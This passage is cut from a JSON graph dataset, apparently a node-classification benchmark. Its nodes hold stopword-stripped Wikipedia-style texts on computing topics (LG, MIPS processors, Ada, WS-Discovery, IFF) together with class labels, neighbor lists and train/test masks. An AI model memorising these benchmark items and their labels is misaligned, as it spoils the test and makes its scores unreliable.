made solid plastic two tiny plastic arms fold end keyboard support tablet smartphone toggle two different bluetooth-connected devices time battery life expected three months single aaa battery lg manufactures home appliances including refrigerators washing machines tumble dryers vacuum cleaners air conditioners microwave ovens june 2014 lg electronics announced launch smart appliances homechat messaging service south korea homechat employs line mobile messenger app korean company 'naver let homeowners communicate control monitor share content lg smart appliances users send simple messages start washing cycle order control washing machines lg sports limited subsidiary lg corporation owns korean baseball organisation kbo lg twins lg 트윈스 thru acquisition 1990 mbc blue dragons one six original founding members kbo 1982 became lg twins team two korean series 1990 1994 lg attracts large attendance fans much enjoyment took 3rd place league august 2013 lg electronics announced would sponsor german bundesliga club bayer 04 leverkusen next three years option extend one year lg sponsors international cricket council world governing body cricket also sponsors icc awards 2009 2013 lg electronics sponsored formula one global partner technology partner lg also official supplier virgin racing lotus racing team plus engine manufacturer cosworth 2010 2012 lg also sponsors london fashion week lg arena birmingham period 2001–2003 lg sponsored snooker grand prix years tournament known lg cup 2008 lg became sponsors extreme sport 'fso4 freeze festival lg electronics company australia dissolved sponsorship former australian vice-captain david warner 27 march 2018 dropped brand ambassador company ball tampering scandal shook australian cricket 3rd test 2017–18 tempestuous test series south africa david warner agreement lg electronics company 2014 contract planned renewal choice magazine independent tests popular lg fridge models 2010 found energy consumption two models higher claimed lg lg aware problem offered compensation affected customers 2004 lg made 4a-rated water efficiency claims numerous washing machines certified lg gave undertakings australian competition consumer commission accc provide appropriate corrective notices upgrade maintain trade practices compliance program 2006 lg overstated energy efficiency five air conditioner models required offer consumers rebates cover extra energy costs march 2018 announced one lg steam clothing care system earned asthma allergy friendly certification lg electronics usa proposed build new headquarters borough englewood cliffs bergen county new jersey including tall building would stand taller tree line hudson palisades us national natural landmark company proposed build environmentally friendly facility englewood cliffs incidental bergen county per-capita leading korean american population received initially favorable legal decision concerning building height issues plan approved local government met resistance segments general public well government officials new jersey adjacent new york initial court decision upholding local government approval overturned new jersey appellate court 2015 lg subsequently submitted revised scaled-down 64-foot building approval borough englewood cliffs 2016 lg broke ground new us 300 million englewood cliffs headquarters 7 february 2017 completed late 2019",
    "neighbors": [
      2179,
      6276,
      9732,
      9863,
      6539,
      3340,
      5262,
      8719,
      1427,
      10393,
      410,
      7835,
      7068,
      798,
      4259,
      5028,
      8355,
      424,
      10537,
      4011,
      3117,
      2862,
      8237,
      9137,
      6834,
      3380,
      1083,
      10303,
      196,
      11588,
      2502,
      11082,
      5963,
      7246,
      2258,
      2259,
      8917,
      8921,
      3162,
      2524,
      1638,
      11631,
      9970,
      11252,
      1400,
      3323,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 425,
    "label": 8,
    "text": "WS-Discovery:ws-discovery web services dynamic discovery ws-discovery technical specification defines multicast discovery protocol locate services local network operates tcp udp port 3702 uses ip multicast address 239.255.255.250 name suggests actual communication nodes done using web services standards notably soap-over-udp udp ports 139 445 1124 3702 tcp ports 139 445 3702 49179 5357,5358 protocol originally developed bea systems canon intel microsoft webmethods july 1 2009 approved standard oasis various components microsoft windows vista operating system use ws-discovery e.g people near ws-discovery integral part windows rally technologies devices profile web services component wsdmon windows 7 later uses ws-discovery automatically discover wsd-enabled network printers show network windows explorer installed double-clicking windows 8 later installation automatic ws-discovery enabled default networked hp printers since circa 2008",
    "neighbors": [
      514,
      1411,
      9734,
      5384,
      7690,
      8203,
      11413,
      7320,
      6811,
      7198,
      10924,
      8238,
      2996,
      2501,
      7878,
      1354,
      1098,
      10829,
      6993,
      601,
      2013,
      4457,
      4974,
      4979,
      10229,
      10879
    ],
    "mask": "Test"
  },
  {
    "node_id": 426,
    "label": 3,
    "text": "MIPS_architecture_processors:mips architecture processors since 1985 numerous processors implementing version mips architecture designed widely used first mips microprocessor r2000 announced 1985 added multiple-cycle multiply divide instructions somewhat independent on-chip unit new instructions added retrieve results unit back register file result-retrieving instructions interlocked r2000 could booted either big-endian little-endian thirty-one 32-bit general purpose registers condition code register designers considered potential bottleneck feature shares amd 29000 alpha unlike registers program counter directly accessible r2000 also support four co-processors one built main cpu handled exceptions traps memory management three left uses one could filled optional r2010 fpu thirty-two 32-bit registers could used sixteen 64-bit registers double-precision r3000 succeeded r2000 1988 adding 32 kb soon increased 64 kb caches instructions data along support shared-memory multiprocessing form cache coherence protocol flaws r3000s multiprocessing support successfully used several successful multiprocessor computers r3000 also included built-in mmu common feature cpus era r3000 like r2000 could paired r3010 fpu r3000 first successful mips design marketplace eventually one million made speed-bumped version r3000 running 40 mhz r3000a delivered performance 32 vups vax unit performance mips r3000a-compatible r3051 running 33.8688 mhz processor used sony playstation though n't fpu mmu third-party designs include performance semiconductor r3400 idt r3500 r3000as integrated r3010 fpu toshiba r3900 virtually first soc early handheld pcs ran windows ce radiation-hardened variant space applications mongoose-v r3000 integrated r3010 fpu r4000 series released 1991 extended mips full 64-bit architecture moved fpu onto main die create single-chip microprocessor high clock frequency 100 mhz introduction however order achieve clock frequency caches reduced 8 kb took three cycles access high operating frequencies achieved technique deep pipelining called super-pipelining time improved r4400 followed 1993 larger 16 kb primary caches largely bug-free 64-bit operation support larger l2 cache mips division sgi called mti designed low-cost r4200 basis even cheaper r4300i derivative microprocessor nec vr4300 used nintendo 64 game console quantum effect devices qed separate company started former mips employees designed r4600 orion r4700 orion r4650 r5000 r4000 pushed clock frequency sacrificed cache capacity qed designs emphasized large caches could accessed two cycles efficient use silicon area r4600 r4700 used low-cost versions sgi indy workstation well first mips-based cisco routers 36x0 7x00-series routers r4650 used original webtv set-top boxes microsoft tv r5000 fpu flexible single precision floating-point scheduling r4000 result r5000-based sgi indys much better graphics performance similarly clocked r4400 indys graphics hardware sgi gave old graphics board new name combined r5000 order emphasize improvement qed later designed rm7000 rm9000 family devices embedded markets like networking laser printers qed acquired semiconductor manufacturer pmc-sierra august 2000 latter company continuing invest mips architecture rm7000 included integrated 256 kb l2 cache controller optional l3 cache rm9xx0 family soc devices included northbridge peripherals memory controller pci controller gigabit ethernet controller fast i/o hypertransport port r8000 1994 first superscalar mips design able execute two integer floating point two memory instructions per cycle design spread six chips integer unit 16 kb instruction 16 kb data caches floating-point unit three full-custom secondary cache tag rams two secondary cache accesses one bus snooping cache controller asic design two fully pipelined double precision multiply-add units could stream data 4 mb off-chip secondary cache r8000 powered sgi power challenge servers mid-1990s later became available power indigo2 workstation although fpu performance fit scientific users quite well limited integer performance high cost dampened appeal users r8000 marketplace year remains fairly rare 1995 r10000 released processor single-chip design ran higher clock frequency r8000 larger 32 kb primary instruction data caches also superscalar major innovation out-of-order execution even single memory pipeline simpler fpu vastly improved integer performance lower price higher density made r10000 preferable customers later designs based upon r10000 core r12000 used 0.25 micrometre process shrink chip achieve higher clock rates revised r14000 allowed higher clock rates additional support ddr sram off-chip cache later iterations named r16000 r16000a feature increased clock frequency smaller die manufacturing compared members mips family include r6000 ecl implementation produced bipolar integrated technology r6000 introduced mips ii architecture translation lookaside buffer tlb cache architecture different members mips family r6000 deliver promised performance benefits although saw use control data machines quickly disappeared mainstream market 1981 john l. hennessy began mips microprocessor without interlocked pipeline stages project stanford university investigate risc technology results research convinced future commercial potential technology 1984 took sabbatical found mips computer systems company designed new architecture also called mips introduced first mips implementation r2000 1985 r2000 improved design introduced r3000 1988 32-bit cpus formed basis company 1980s used primarily sgi series workstations later digital equipment corporation decstation workstations servers sgi commercial designs deviated stanford mips implementing interlocks hardware supplying full multiply divide instructions among others designs guided part software architect earl killian designed mips iii 64-bit instruction-set extension led work r4000 microarchitecture 1991 mips released first 64-bit microprocessor r4000 however mips financial difficulties bringing market design important sgi time one mips major customers sgi bought company outright 1992 order guarantee design would lost subsidiary sgi company became known mips technologies early 1990s mips started licensing designs third-party vendors proved fairly successful due simplicity core allowed used number applications would formerly used much less capable cisc designs similar gate count price—the two strongly related price cpu generally related number gates number external pins sun microsystems attempted enjoy similar success licensing sparc core nearly successful late 1990s mips powerhouse embedded processor field according mips technologies inc. exponential growth 48-million mips-based cpu shipments 49 total risc cpu market share 1997 mips successful sgi spun mips technologies 1998 fully half mips income today comes licensing designs much rest comes contract design work cores produced third parties 1999 mips technologies replaced previous versions mips architecture two architectures 32-bit mips32 based mips ii additional features mips iii mips iv mips v 64-bit mips64 based mips v licensing nec toshiba sibyte later acquired broadcom obtained licenses mips64 soon announced philips lsi logic idt since joined today mips cores one most-used heavyweight cores marketplace computer-like devices hand-held computers set-top boxes etc. since mips architecture licensable attracted several processor start-up companies years one first start-ups design mips processors quantum effect devices see next section mips design team designed r4300i started company sandcraft designed r5432 nec later produced sr71000 one first out-of-order execution processors embedded market original dec strongarm team eventually split two mips-based start-ups sibyte produced sb-1250 one first high-performance mips-based systems-on-a-chip soc alchemy semiconductor later acquired amd produced au-1000 soc low-power applications lexra used mips- like architecture added dsp extensions audio chip market multithreading support networking market due lexra licensing architecture two lawsuits started two companies first quickly resolved lexra promised advertise processors mips-compatible second mips patent 4814976 handling unaligned memory access protracted hurt companies business culminated mips technologies giving lexra free license large cash payment two companies emerged specialize building multi-core devices using mips architecture raza microelectronics inc. purchased product line failing sandcraft later produced devices contained eight cores targeted telecommunications networking markets cavium originally security processor vendor also produced devices eight cpu cores later 32 cores markets companies designed cores in-house licensing architecture instead purchasing cores mips among manufacturers made computer workstation systems using mips processors sgi mips computer systems inc. whitechapel workstations olivetti siemens-nixdorf acer digital equipment corporation nec deskstation operating systems ported architecture include sgi irix microsoft windows nt v4.0 windows ce linux freebsd netbsd openbsd unix system v sinix qnx mips computer systems risc/os speculation early 1990s mips powerful risc processors would overtake intel ia-32 architecture encouraged support first two versions microsoft windows nt alpha mips powerpc—and lesser extent clipper architecture sparc however intel quickly released faster versions pentium class cpus microsoft windows nt v4.0 dropped support anything ia-32 alpha sgi decision transition itanium ia-32 architectures 2007 following 2006 chapter 11 bankruptcy 2009 acquisition rackable systems inc. support ended mips/irix consumer market december 2013 originally scheduled however support team still exists special circumstances refurbished systems still available limited basis 1990s mips architecture widely adopted embedded market including use computer networking telecommunications video arcade games video game consoles computer printers digital set-top boxes digital televisions dsl cable modems personal digital assistants low power-consumption heat characteristics embedded mips implementations wide availability embedded development tools knowledge architecture means use mips microprocessors embedded roles likely remain common recent years technology used various mips generations offered ip-cores building-blocks embedded processor designs 32-bit 64-bit basic cores offered known 4k 5k cores mixed add-in units fpus simd systems various input/output devices etc mips cores commercially successful used many consumer industrial applications mips cores found newer cisco linksys mikrotik routerboard routers cable modems adsl modems smartcards laser printer engines set-top boxes robots hand-held computers cellphones pdas mips largely unable displace incumbent competing arm architecture mips architecture processors include idt rc32438 ati/amd xilleon alchemy au1000 1100 1200 broadcom sentry5 rmi xlr7xx cavium octeon cn30xx cn31xx cn36xx cn38xx cn5xxx infineon technologies easyport amazon danube adm5120 wildpass inca-ip inca-ip2 microchip technology pic32 nec emma emma2 nec vr4181a vr4121 vr4122 vr4181a vr4300 vr5432 vr5500 oak technologies generation pmc-sierra rm11200 quicklogic quickmips esp toshiba donau toshiba tmpr492x tx4925 tx9956 tx7901 komdiv-32 komdiv-64 elvees multicore russia one interesting applications mips architecture use massive processor count supercomputers silicon graphics sgi refocused business desktop graphics workstations high-performance computing market early 1990s success company first foray server systems challenge series based r4400 r8000 later r10000 motivated sgi create vastly powerful system introduction integrated r10000 allowed sgi produce system origin 2000 eventually scalable 1024 cpus using numalink cc-numa interconnect origin 2000 begat origin 3000 series topped 1024 maximum cpu count using r14000 r16000 chips 700 mhz mips-based supercomputers withdrawn 2005 sgi made strategic decision move intel ia-64 architecture high-performance computing startup called sicortex introduced massively parallel mips-based supercomputer 2007 machines based mips64 architecture high performance interconnect using kautz graph topology system power efficient computationally powerful innovative aspect system multicore processing node integrates six mips64 cores crossbar switch memory controller interconnect dma engine gigabit ethernet pci express controllers single chip consumes 10 watts power yet peak floating point performance 6 gigaflops powerful configuration sc5832 single cabinet supercomputer consisting 972 node chips total 5832 mips64 processor cores 8.2 teraflops peak performance loongson family mips-compatible microprocessors designed chinese academy sciences institute computing technology ict independently designed chinese early models lacked support four instructions patented mips technologies june 2009 ict licensed mips32 mips64 architectures mips technologies starting 2006 number companies released loongson-based computers including nettops netbooks designed low-power use dawning 6000 supercomputer projected performance 1 pflops use loongson processor dawning 6000 currently jointly developed ict dawning information industry company li guojie chairman dawning information industry company director academician ict said research development dawning 6000 expected completed two years chinese-made high-performance computers expected achieve two major breakthroughs first adoption domestically made processors second existing cluster-based system structure high-performance computers changed performance reaches 1 pflops announced 2012 mips aptiv family includes three 32-bit cpu products based mips32 release 3 architecture microaptiv compact real-time embedded processor core five-stage pipeline micromips code compression instruction set microaptiv either configured microprocessor microaptiv instruction data caches memory management unit microcontroller microaptiv uc memory protection unit cpu integrates dsp simd functionality address signal processing requirements entry-level embedded segments including industrial control smart meters automotive wired/wireless communications interaptiv multiprocessor core leveraging nine-stage pipeline multi-threading core used highly-parallel applications requiring cost power optimization smart gateways baseband processing lte user equipment small cells ssd controllers automotive equipment proaptiv superscalar out-of-order processor core available single multi-core product versions proaptiv designed applications processing connected consumer electronics control plane processing networking applications announced june 2013 mips warrior family includes multiple 32-bit 64-bit cpu products based mips release 5 6 architectures 32-bit mips cores embedded microcontroller applications 64-bit mips cpus high-performance low-power embedded applications 32-bit 64-bit mips application processors",
    "neighbors": [
      9857,
      4098,
      6659,
      5380,
      8327,
      8711,
      9739,
      3597,
      6926,
      783,
      8976,
      1425,
      9745,
      5523,
      2452,
      7445,
      2071,
      5272,
      9851,
      4124,
      6815,
      8481,
      8355,
      5028,
      6057,
      938,
      8237,
      7983,
      5681,
      10548,
      1461,
      823,
      321,
      7234,
      9665,
      10051,
      3014,
      2503,
      1480,
      3142,
      6858,
      10316,
      2638,
      731,
      7263,
      8035,
      6247,
      6250,
      6252,
      6253,
      8044,
      9964,
      6256,
      10734,
      5492,
      5237,
      1399,
      760,
      3451,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 427,
    "label": 4,
    "text": "Register_spring:register spring computer security register spring sort trampoline bogus return pointer structured exception handling seh pointer exploit places call stack directing control flow existing code within dynamic-link library dll static program binary target code turn consists call jump call ebx jmp esp appropriate processor register previously prepared exploit point payload code begins",
    "neighbors": [
      5040,
      3473,
      2558,
      9911
    ],
    "mask": "Train"
  },
  {
    "node_id": 428,
    "label": 9,
    "text": "Ada_(programming_language):ada programming language ada structured statically typed imperative object-oriented high-level computer programming language extended pascal languages built-in language support design-by-contract extremely strong typing explicit concurrency tasks synchronous message passing protected objects non-determinism ada improves code safety maintainability using compiler find errors favor runtime errors ada international standard current version known ada 2012 defined iso/iec 8652:2012 ada originally designed team led french computer scientist jean ichbiah cii honeywell bull contract united states department defense dod 1977 1983 supersede 450 programming languages used dod time ada named ada lovelace 1815–1852 credited first computer programmer ada originally targeted embedded real-time systems ada 95 revision designed s. tucker taft intermetrics 1992 1995 improved support systems numerical financial object-oriented programming oop features ada include strong typing modularity mechanisms packages run-time checking parallel processing tasks synchronous message passing protected objects nondeterministic select statements exception handling generics ada 95 added support object-oriented programming including dynamic dispatch syntax ada minimizes choices ways perform basic operations prefers english keywords else symbols || ada uses basic arithmetical operators avoids using symbols code blocks delimited words declare begin end end cases followed identifier block closes e.g. ... end loop ... end loop case conditional blocks avoids dangling else could pair wrong nested if-expression languages like c java ada designed development large software systems ada packages compiled separately ada package specifications package interface also compiled separately without implementation check consistency makes possible detect problems early design phase implementation starts large number compile-time checks supported help avoid bugs would detectable run-time languages would require explicit checks added source code example syntax requires explicitly named closing blocks prevent errors due mismatched end tokens adherence strong typing allows detection many common software errors wrong parameters range violations invalid references mismatched types etc either compile-time otherwise run-time concurrency part language specification compiler cases detect potential deadlocks compilers also commonly check misspelled identifiers visibility packages redundant declarations etc provide warnings useful suggestions fix error ada also supports run-time checks protect access unallocated memory buffer overflow errors range violations off-by-one errors array access errors detectable bugs checks disabled interest runtime efficiency often compiled efficiently also includes facilities help program verification reasons ada widely used critical systems anomaly might lead serious consequences e.g. accidental death injury severe financial loss examples systems ada used include avionics air traffic control railways banking military space technology ada dynamic memory management high-level type-safe ada generic untyped pointers implicitly declare pointer type instead dynamic memory allocation deallocation must take place explicitly declared access types access type associated storage pool handles low-level details memory management programmer either use default storage pool define new ones particularly relevant non-uniform memory access even possible declare several different access types designate type use different storage pools also language provides accessibility checks compile time run time ensures access value outlive type object points though semantics language allow automatic garbage collection inaccessible objects implementations support default would cause unpredictable behaviour real-time systems ada support limited form region-based memory management also creative use storage pools provide limited form automatic garbage collection since destroying storage pool also destroys objects pool double-dash -- resembling em dash denotes comment text comments stop end line prevent unclosed comments accidentally voiding whole sections source code disabling whole block code requires prefixing line column individually -- clearly denoting disabled code column repeated -- page renders experimental dis/re-enablement large blocks drawn process semicolon statement terminator null no-operation statement codice_1 single codice_2 without statement terminate allowed unlike iso standards ada language definition known ada reference manual arm sometimes language reference manual lrm free content thus common reference ada programmers programmers implementing ada compilers apart reference manual also extensive rationale document explains language design use various language constructs document also widely used programmers language revised new rationale document written one notable free software tool used many ada programmers aid writing ada source code gnat programming studio 1970s us department defense dod concerned number different programming languages used embedded computer system projects many obsolete hardware-dependent none supported safe modular programming 1975 working group high order language working group holwg formed intent reduce number finding creating programming language generally suitable department uk ministry defence requirements many iterations beginning original straw man proposal eventual programming language named ada total number high-level programming languages use projects fell 450 1983 37 1996 holwg working group crafted steelman language requirements series documents stating requirements felt programming language satisfy many existing languages formally reviewed team concluded 1977 existing language met specifications requests proposals new programming language issued four contractors hired develop proposals names red intermetrics led benjamin brosgol green cii honeywell bull led jean ichbiah blue softech led john goodenough yellow sri international led jay spitzen april 1978 public scrutiny red green proposals passed next phase may 1979 green proposal designed jean ichbiah cii honeywell bull chosen given name ada—after augusta ada countess lovelace proposal influenced programming language lis ichbiah group developed 1970s preliminary ada reference manual published acm sigplan notices june 1979 military standard reference manual approved december 10 1980 ada lovelace birthday given number mil-std-1815 honor ada lovelace birth year 1981 c. a. r. hoare took advantage turing award speech criticize ada overly complex hence unreliable subsequently seemed recant foreword wrote ada textbook ada attracted much attention programming community whole early days backers others predicted might become dominant language general purpose programming defense-related work ichbiah publicly stated within ten years two programming languages would remain ada lisp early ada compilers struggled implement large complex language compile-time run-time performance tended slow tools primitive compiler vendors expended efforts passing massive language-conformance-testing government-required acvc validation suite required another novel feature ada language effort jargon file dictionary computer hacker slang originating 1975-1983 notes entry ada precisely one might expect given kind endorsement fiat designed committee ... difficult use overall disastrous multi-billion-dollar boondoggle ... ada lovelace ... would almost certainly blanch use name latterly put kindest thing said probably good small language screaming get inside vast elephantine bulk first validated ada implementation nyu ada/ed translator certified april 11 1983 nyu ada/ed implemented high-level set language setl number commercial companies began offering ada compilers associated development tools including alsys telesoft ddc-i advanced computer techniques tartan laboratories tld systems verdix others 1991 us department defense began require use ada ada mandate software though exceptions rule often granted department defense ada mandate effectively removed 1997 dod began embrace cots technology similar requirements existed nato countries ada required nato systems involving command control functions ada mandated preferred language defense-related applications countries sweden germany canada late 1980s early 1990s ada compilers improved performance still barriers full exploitation ada abilities including tasking model different real-time programmers used ada safety-critical support features used military applications also commercial projects software bug severe consequences e.g. avionics air traffic control commercial rockets ariane 4 5 satellites space systems railway transport banking example airplane information management system fly-by-wire system software boeing 777 written ada developed honeywell air transport systems collaboration consultants ddc-i became arguably best-known ada project civilian military canadian automated air traffic system written 1 million lines ada sloc count featured advanced distributed processing distributed ada database object-oriented design ada also used air traffic systems e.g. uk next-generation interim future area control tools support ifacts air traffic control system designed implemented using spark ada also used french tvm in-cab signalling system tgv high-speed rail system metro suburban trains paris london hong kong new york city language became ansi standard 1983 ansi/mil-std 1815a translation french without changes english became iso standard 1987 iso-8652:1987 version language commonly known ada 83 date adoption ansi sometimes referred also ada 87 date adoption iso ada 95 joint iso/ansi standard iso-8652:1995 published february 1995 making ada 95 first iso standard object-oriented programming language help standard revision future acceptance us air force funded development gnat compiler presently gnat compiler part gnu compiler collection work continued improving updating technical content ada programming language technical corrigendum ada 95 published october 2001 major amendment iso/iec 8652:1995/amd 1:2007 published march 9 2007 ada-europe 2012 conference stockholm ada resource association ara ada-europe announced completion design latest version ada programming language submission reference manual international organization standardization iso approval iso/iec 8652:2012 published december 2012 related standards include iso 8651-3:1988 information processing systems—computer graphics—graphical kernel system gks language bindings—part 3 ada ada algol-like programming language featuring control structures reserved words else however ada also many data structuring facilities abstractions included original algol 60 type definitions records pointers enumerations constructs part inherited inspired pascal common example language syntax hello world program ada.text_io use ada.text_io procedure hello begin end hello program compiled using freely available open source compiler gnat executing gnatmake hello.adb ada type system based set predefined primitive types allows users declare types declaration turn based internal representation type describing goal achieved allows compiler determine suitable memory size type check violations type definition compile time run time i.e. range violations buffer overruns type consistency etc. ada supports numerical types defined range modulo types aggregate types records arrays enumeration types access types define reference instance specified type untyped pointers permitted special types provided language task types protected types example date might represented type day_type range 1 .. 31 type month_type range 1 .. 12 type year_type range 1800 .. 2100 type hours mod 24 type weekday monday tuesday wednesday thursday friday saturday sunday type date types refined declaring subtypes subtype working_hours hours range 0 .. 12 -- 12 hours work day subtype working_day weekday range monday .. friday -- days work work_load constant array working_day working_hours -- implicit type declaration types modifiers limited abstract private etc private types accessed limited types modified copied within scope package defines ada 95 adds additional features object-oriented extension types ada structured programming language meaning flow control structured standard statements standard constructs deep-level early exit supported use also supported go commands seldom needed -- equal b loop /= b loop end loop b else end 1 .. 10 loop end loop loop end loop case end case aweekday weekday'range loop -- loop enumeration end loop among parts ada program packages procedures functions example package specification example.ads package example end example package body example.adb ada.text_io package body example -- package initialization executed package elaborated begin end example program compiled e.g. using freely available open-source compiler gnat executing gnatmake -z example.adb packages procedures functions nest depth also logical outermost block package procedure function declarations constants types variables procedures functions packages declared order ada language support task-based concurrency fundamental concurrent unit ada task built-in limited type tasks specified two parts – task declaration defines task interface similar type declaration task body specifies implementation task depending implementation ada tasks either mapped operating system threads processes scheduled internally ada runtime tasks entries synchronisation form synchronous message passing task entries declared task specification task entry one accept statements within task body control flow task reaches accept statement task blocked corresponding entry called another task similarly calling task blocked called task reaches corresponding accept statement task entries parameters similar procedures allowing tasks synchronously exchange data conjunction select statements possible define guards accept statements similar dijkstra guarded commands ada also offers protected objects mutual exclusion protected objects monitor-like construct use guards instead conditional variables signaling similar conditional critical regions protected objects combine data encapsulation safe mutual exclusion monitors entry guards conditional critical regions main advantage classical monitors conditional variables required signaling avoiding potential deadlocks due incorrect locking semantics like tasks protected object built-in limited type also declaration part body protected object consists encapsulated private data accessed within protected object procedures functions entries guaranteed mutually exclusive exception functions required side effect free therefore run concurrently functions task calling protected object blocked another task currently executing inside protected object released task leaves protected object blocked tasks queued protected object ordered time arrival protected object entries similar procedures additionally guards guard evaluates false calling task blocked added queue entry another task admitted protected object task currently executing inside protected object guards re-evaluated whenever task leaves protected object time evaluation guards changed calls entries requeued entries signature task requeued blocked added queue target entry means protected object released allows admission another task select statement ada used implement non-blocking entry calls accepts non-deterministic selection entries also guards time-outs aborts following example illustrates concepts concurrent programming ada ada.text_io use ada.text_io procedure traffic begin end traffic pragma compiler directive conveys information compiler allow specific manipulation compiled output certain pragmas built language others implementation-specific examples common usage compiler pragmas would disable certain features run-time type checking array subscript boundary checking instruct compiler insert object code instead function call c/c++ inline functions",
    "neighbors": [
      512,
      516,
      9224,
      2062,
      6160,
      6675,
      1556,
      10261,
      3613,
      9245,
      5663,
      10786,
      1572,
      2605,
      5677,
      9264,
      5684,
      7734,
      2617,
      58,
      3642,
      6718,
      9280,
      10819,
      7237,
      8262,
      1610,
      1611,
      9804,
      6228,
      3159,
      7256,
      1116,
      10851,
      7274,
      9330,
      3705,
      1145,
      7292,
      9345,
      8326,
      5768,
      1673,
      2186,
      9871,
      10386,
      10387,
      11411,
      9366,
      5783,
      3737,
      154,
      155,
      7326,
      5796,
      1702,
      4777,
      9385,
      10921,
      10413,
      3762,
      7867,
      10430,
      5826,
      2761,
      5833,
      10953,
      721,
      7889,
      10964,
      217,
      10465,
      11490,
      10470,
      11497,
      2283,
      10478,
      10991,
      10480,
      2804,
      4341,
      2304,
      8973,
      6414,
      10510,
      3876,
      3367,
      3886,
      7983,
      9008,
      305,
      5428,
      823,
      7479,
      1849,
      10555,
      8510,
      10560,
      321,
      10569,
      8524,
      11599,
      9557,
      10585,
      10586,
      4957,
      4964,
      6502,
      11625,
      8554,
      10098,
      3960,
      380,
      5503,
      8576,
      4995,
      3462,
      4998,
      8582,
      8082,
      10649,
      1435,
      6044,
      6558,
      7071,
      1952,
      10145,
      5029,
      5546,
      5039,
      5040,
      6074,
      1474,
      963,
      8644,
      10179,
      3529,
      5074,
      11219,
      5588,
      2519,
      4057,
      4572,
      477,
      8675,
      4069,
      5612,
      10739,
      7158,
      1016,
      8188,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 429,
    "label": 5,
    "text": "X_Image_Extension:x image extension x image extension xie extension x window system enhance graphics capability intended provide powerful mechanism transfer display virtually image x-capable hardware first released x11r6 1994 longer included x11 reference distribution removed x11r6.7 2004 xie never gained significant usage — according jim gettys failed due excessive complexity lack good implementation intended use general purpose image-processing engine xie provide set image rendition enhancement primitives could combined arbitrarily complex expressions xie also provided import export facilities moving images client server accessing images resources client side programming library xielib documented prentice hall book developing imaging applications xielib syd logan addition server client library performance test tool xieperf included x11r6 client also written syd logan xie developed contract x consortium san diego ca company longer extant called age logic principal team members include larry hare bob shelley dr. dean verheiden dr. ben fahey dr. gary rogers syd logan practical purposes image extension obsolete adequate image performance instead gained use ubiquitous mit-shm extension allows transfer large images client server machine common use-case via shared memory",
    "neighbors": [
      9223,
      8682,
      5867,
      1644,
      7309,
      8975,
      3764,
      2581,
      11485
    ],
    "mask": "Test"
  },
  {
    "node_id": 430,
    "label": 2,
    "text": "Action_Center:action center action center notification center included windows phone 8.1 windows 10 windows 10 mobile first introduced windows phone 8.1 july 2014 introduced desktop launch windows 10 july 29 2015 action center replaces charms windows 10 action center allows four quick settings windows 10 users expand view show quick settings notifications sorted categories app users swipe right clear notifications action center also supports actionable notifications starting windows 10 mobile version user swipe top bottom invoke action center features introduced windows phone 8.1 include ability change simple settings volume controls new notifications area design allows user example change wireless networks turn bluetooth airplane mode access driving mode four customisable boxes top screen beneath four horizontally placed boxes include recent text messages social integration desktop version user invoke action center clicking icon taskbar lower right corner screen swiping right microsoft announced microsoft build 2016 cortana would able mirror notifications actions centers windows 10 mobile windows 10 cortana would also able synchronize notifications android devices windows 10 action center",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      6709,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      4704,
      3170,
      8296,
      8299,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      9434,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      10986,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      7456,
      5413,
      11559,
      5928,
      3881,
      6441,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1417,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      7118,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 431,
    "label": 8,
    "text": "Web_Services_Security_Kerberos_Binding:web services security kerberos binding web services security kerberos binding web services specification authored ibm microsoft details integrate kerberos authentication mechanism web services security model recent draft specification released 2003 identified review evaluation",
    "neighbors": [
      6098,
      3323,
      10020,
      7878
    ],
    "mask": "None"
  },
  {
    "node_id": 432,
    "label": 2,
    "text": "Interchange_File_Format:interchange file format interchange file format iff generic container file format originally introduced electronic arts company 1985 cooperation commodore order facilitate transfer data software produced different companies iff files standard extension many systems generate iff files file extensions important os stores file format metadata separately file name codice_1 extension commonly used ilbm format files use iff container format resource interchange file format format developed microsoft ibm 1991 based iff except byte order changed little-endian match x86 processor architecture apple aiff big-endian audio file format developed iff tiff image file format unrelated iff file built chunks chunk begins specification calls type id macintosh called ostype windows developers might call fourcc followed 32-bit signed integer integers iff file structure big-endian specifying size following data chunk content bytes specification includes explicit lengths chunk possible parser skip chunks either ca n't n't care process structure closely related type-length-value tlv representation predefined group chunks type ids codice_2 codice_3 codice_4 codice_2 chunk like record structure containing type id indicating record type followed nested chunks specifying record fields codice_3 factoring structure containing series codice_7 property chunks plus nested group chunks properties apply codice_4 collection nested chunks special semantics group chunks contain group chunks depending needs application group chunks like simpler counterparts contain length element skipping group thus done simple unix-style relative seek operation chunks must begin even file offsets befits origins iff motorola 68000 processor could n't address quantities larger byte odd addresses thus chunks odd lengths padded even byte boundary adding so-called pad byte regular end top-level structure iff file consists exactly one group chunks codice_2 codice_3 codice_4 codice_2 far common one type chunk typically different internal structure could numerical data text raw data also possible include iff files chunks note structure four letters followed length formats use standard chunks could present iff file codice_13 containing text information author file codice_14 containing text annotation usually name program created file codice_15 containing text name work file codice_16 containing file version codice_17 containing text copyright information also chunks common among number formats codice_18 holds color palette ilbm anim dr2d files pictures animations vector pictures chunks common name hold different data codice_19 could store image ilbm file sound 8svx file finally chunks unique file type programs create iff files add chunks internal data files later read programs without disruption parsers could skip uninteresting chunks great advantage 